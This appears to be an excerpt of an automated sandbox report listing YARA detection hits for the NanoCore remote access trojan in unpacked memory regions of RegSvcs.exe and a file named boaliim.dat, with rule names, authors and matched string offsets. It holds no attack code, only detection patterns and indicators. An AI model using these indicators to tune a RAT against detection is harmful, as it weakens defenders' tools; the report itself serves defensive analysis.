13.2.RegSvcs.exe.1100000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.1100000.0.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
13.2.RegSvcs.exe.1100000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.RegSvcs.exe.1100000.0.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7ad0000.25.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7ad0000.25.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7ad0000.25.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5ad5:$x2: NanoCore.ClientPlugin 0x59eb:$x3: NanoCore.ClientPluginHost 0x5aeb:$i3: IClientNetwork 0x5a24:$i5: IClientDataHost 0x5a05:$i6: IClientLoggingHost 0x5b48:$i7: IClientNetworkHost 0x5a43:$i8: IClientUIHost 0x6955:$i9: IClientNameObjectCollection 0x54fc:$s1: ClientPlugin 0x5ade:$s1: ClientPlugin 0x6971:$s6: get_ClientSettings
13.2.RegSvcs.exe.7ad0000.25.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x59eb:$a1: NanoCore.ClientPluginHost 0x5ad5:$a2: NanoCore.ClientPlugin 0x732e:$b7: LogClientException 0x6941:$b8: PipeExists 0x5a05:$b9: IClientLoggingHost
13.2.RegSvcs.exe.5ce0000.14.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
13.2.RegSvcs.exe.5ce0000.14.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
13.2.RegSvcs.exe.5ce0000.14.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
13.2.RegSvcs.exe.5ce0000.14.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7b60000.32.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x41ee:$x1: NanoCore.ClientPluginHost 0x422b:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b60000.32.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x41ee:$x2: NanoCore.ClientPluginHost 0x7641:$s4: PipeCreated 0x4218:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b60000.32.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x41c9:$x2: NanoCore.ClientPlugin 0x41ee:$x3: NanoCore.ClientPluginHost 0x41ba:$i3: IClientNetwork 0x41df:$i4: IClientAppHost 0x4208:$i5: IClientDataHost 0x4218:$i6: IClientLoggingHost 0x422b:$i7: IClientNetworkHost 0x423e:$i8: IClientUIHost 0x424c:$i9: IClientNameObjectCollection 0x3f70:$s1: ClientPlugin 0x41d2:$s1: ClientPlugin
13.2.RegSvcs.exe.7b60000.32.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x41ee:$a1: NanoCore.ClientPluginHost 0x41c9:$a2: NanoCore.ClientPlugin 0x41df:$b4: IClientAppHost 0x86ce:$b7: LogClientException 0x4218:$b9: IClientLoggingHost
7.3.boaliim.dat.192cc48.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.3.boaliim.dat.192cc48.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.3.boaliim.dat.192cc48.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.3.boaliim.dat.192cc48.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
7.3.boaliim.dat.192cc48.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.3.boaliim.dat.192cc48.2.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
7.3.boaliim.dat.192cc48.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.3.boaliim.dat.192cc48.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.3.boaliim.dat.192cc48.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.3.boaliim.dat.192cc48.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
7.3.boaliim.dat.192cc48.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.3.boaliim.dat.192cc48.3.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7a60000.20.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7a60000.20.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7a60000.20.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x8b7f:$x2: NanoCore.ClientPlugin 0x8ba5:$x3: NanoCore.ClientPluginHost 0x8b70:$i3: IClientNetwork 0x8b95:$i5: IClientDataHost 0x8bbf:$i6: IClientLoggingHost 0x8bd2:$i7: IClientNetworkHost 0x8be5:$i9: IClientNameObjectCollection 0x8902:$s1: ClientPlugin 0x8b88:$s1: ClientPlugin
13.2.RegSvcs.exe.7a60000.20.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x8ba5:$a1: NanoCore.ClientPluginHost 0x8b7f:$a2: NanoCore.ClientPlugin 0x8bbf:$b9: IClientLoggingHost
7.3.boaliim.dat.1995c58.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.3.boaliim.dat.1995c58.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
7.3.boaliim.dat.1995c58.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.3.boaliim.dat.1995c58.1.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
7.3.boaliim.dat.1995c58.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
7.3.boaliim.dat.1995c58.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.3.boaliim.dat.1995c58.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.3.boaliim.dat.1995c58.1.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
7.3.boaliim.dat.1995c58.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.3.boaliim.dat.1995c58.0.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
7.3.boaliim.dat.1995c58.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.3.boaliim.dat.1995c58.0.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7ab0000.23.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7ab0000.23.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7ab0000.23.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x227f:$x2: NanoCore.ClientPlugin 0x2205:$x3: NanoCore.ClientPluginHost 0x2295:$i3: IClientNetwork 0x221f:$i6: IClientLoggingHost 0x223e:$i7: IClientNetworkHost 0x1f9f:$s1: ClientPlugin 0x2288:$s1: ClientPlugin
13.2.RegSvcs.exe.7ab0000.23.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2205:$a1: NanoCore.ClientPluginHost 0x227f:$a2: NanoCore.ClientPlugin 0x29a0:$b7: LogClientException 0x221f:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7ae0000.26.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7ae0000.26.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7ae0000.26.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3a8b:$x2: NanoCore.ClientPlugin 0x39eb:$x3: NanoCore.ClientPluginHost 0x3aa1:$i3: IClientNetwork 0x3a43:$i5: IClientDataHost 0x3a05:$i6: IClientLoggingHost 0x3a24:$i7: IClientNetworkHost 0x426c:$i9: IClientNameObjectCollection 0x3741:$s1: ClientPlugin 0x3a94:$s1: ClientPlugin 0x4680:$s2: EndPoint 0x4371:$s3: IPAddress 0x3c83:$s4: IPEndPoint 0x43a3:$s7: get_Connected
13.2.RegSvcs.exe.7ae0000.26.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x39eb:$a1: NanoCore.ClientPluginHost 0x3a8b:$a2: NanoCore.ClientPlugin 0x47e1:$b7: LogClientException 0x3a05:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7ac0000.24.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x13a8:$x1: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.7ac0000.24.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7ac0000.24.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x13f2:$x2: NanoCore.ClientPlugin 0x13a8:$x3: NanoCore.ClientPluginHost 0x1408:$i3: IClientNetwork 0x13c2:$i6: IClientLoggingHost 0x1185:$s1: ClientPlugin 0x13fb:$s1: ClientPlugin
13.2.RegSvcs.exe.7ac0000.24.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x13a8:$a1: NanoCore.ClientPluginHost 0x13f2:$a2: NanoCore.ClientPlugin 0x13c2:$b9: IClientLoggingHost
13.2.RegSvcs.exe.37f43e4.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x40a6:$x1: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.37f43e4.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x40a6:$x2: NanoCore.ClientPluginHost 0x4184:$s4: PipeCreated 0x40c0:$s5: IClientLoggingHost
13.2.RegSvcs.exe.3870bfc.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x16e3:$x1: NanoCore.ClientPluginHost 0xb543:$x1: NanoCore.ClientPluginHost 0x13479:$x1: NanoCore.ClientPluginHost 0x1945c:$x1: NanoCore.ClientPluginHost 0x22ed7:$x1: NanoCore.ClientPluginHost 0x2d313:$x1: NanoCore.ClientPluginHost 0x38305:$x1: NanoCore.ClientPluginHost 0x440bb:$x1: NanoCore.ClientPluginHost 0x4fe12:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost 0xb57c:$x2: IClientNetworkHost 0x134b2:$x2: IClientNetworkHost 0x23034:$x2: IClientNetworkHost 0x2d34c:$x2: IClientNetworkHost 0x3831f:$x2: IClientNetworkHost 0x440d5:$x2: IClientNetworkHost 0x4fe4f:$x2: IClientNetworkHost
13.2.RegSvcs.exe.3870bfc.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x16e3:$x2: NanoCore.ClientPluginHost 0xb543:$x2: NanoCore.ClientPluginHost 0x13479:$x2: NanoCore.ClientPluginHost 0x1945c:$x2: NanoCore.ClientPluginHost 0x22ed7:$x2: NanoCore.ClientPluginHost 0x2d313:$x2: NanoCore.ClientPluginHost 0x38305:$x2: NanoCore.ClientPluginHost 0x440bb:$x2: NanoCore.ClientPluginHost 0x4fe12:$x2: NanoCore.ClientPluginHost 0x23e2d:$s3: PipeExists 0x1800:$s4: PipeCreated 0xb647:$s4: PipeCreated 0x13594:$s4: PipeCreated 0x1953a:$s4: PipeCreated 0x230cd:$s4: PipeCreated 0x2d45e:$s4: PipeCreated 0x3933a:$s4: PipeCreated 0x45e66:$s4: PipeCreated 0x53265:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost 0xb55d:$s5: IClientLoggingHost
13.2.RegSvcs.exe.37f43e4.1.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x40f0:$x2: NanoCore.ClientPlugin 0x40a6:$x3: NanoCore.ClientPluginHost 0x4106:$i3: IClientNetwork 0x40c0:$i6: IClientLoggingHost 0x3e3f:$s1: ClientPlugin 0x40f9:$s1: ClientPlugin
13.2.RegSvcs.exe.37f43e4.1.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x40a6:$a1: NanoCore.ClientPluginHost 0x40f0:$a2: NanoCore.ClientPlugin 0x40c0:$b9: IClientLoggingHost
13.2.RegSvcs.exe.3870bfc.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x175f:$x2: NanoCore.ClientPlugin 0xb5bf:$x2: NanoCore.ClientPlugin 0x134f3:$x2: NanoCore.ClientPlugin 0x194a6:$x2: NanoCore.ClientPlugin 0x22fc1:$x2: NanoCore.ClientPlugin 0x2d3b3:$x2: NanoCore.ClientPlugin 0x382dc:$x2: NanoCore.ClientPlugin 0x44092:$x2: NanoCore.ClientPlugin 0x4fded:$x2: NanoCore.ClientPlugin 0x16e3:$x3: NanoCore.ClientPluginHost 0xb543:$x3: NanoCore.ClientPluginHost 0x13479:$x3: NanoCore.ClientPluginHost 0x1945c:$x3: NanoCore.ClientPluginHost 0x22ed7:$x3: NanoCore.ClientPluginHost 0x2d313:$x3: NanoCore.ClientPluginHost 0x38305:$x3: NanoCore.ClientPluginHost 0x440bb:$x3: NanoCore.ClientPluginHost 0x4fe12:$x3: NanoCore.ClientPluginHost 0x1775:$i3: IClientNetwork 0xb5d5:$i3: IClientNetwork 0x13509:$i3: IClientNetwork
13.2.RegSvcs.exe.3870bfc.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0xb543:$a: NanoCore 0xb5bf:$a: NanoCore 0xdea2:$a: NanoCore 0x13479:$a: NanoCore 0x134f3:$a: NanoCore 0x1945c:$a: NanoCore 0x194a6:$a: NanoCore 0x1a100:$a: NanoCore 0x22ed7:$a: NanoCore 0x22fc1:$a: NanoCore 0x23e38:$a: NanoCore
13.2.RegSvcs.exe.3870bfc.2.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x16e3:$a1: NanoCore.ClientPluginHost 0xb543:$a1: NanoCore.ClientPluginHost 0x13479:$a1: NanoCore.ClientPluginHost 0x1945c:$a1: NanoCore.ClientPluginHost 0x22ed7:$a1: NanoCore.ClientPluginHost 0x2d313:$a1: NanoCore.ClientPluginHost 0x38305:$a1: NanoCore.ClientPluginHost 0x440bb:$a1: NanoCore.ClientPluginHost 0x4fe12:$a1: NanoCore.ClientPluginHost 0x175f:$a2: NanoCore.ClientPlugin 0xb5bf:$a2: NanoCore.ClientPlugin 0x134f3:$a2: NanoCore.ClientPlugin 0x194a6:$a2: NanoCore.ClientPlugin 0x22fc1:$a2: NanoCore.ClientPlugin 0x2d3b3:$a2: NanoCore.ClientPlugin 0x382dc:$a2: NanoCore.ClientPlugin 0x44092:$a2: NanoCore.ClientPlugin 0x4fded:$a2: NanoCore.ClientPlugin 0x4fe03:$b4: IClientAppHost 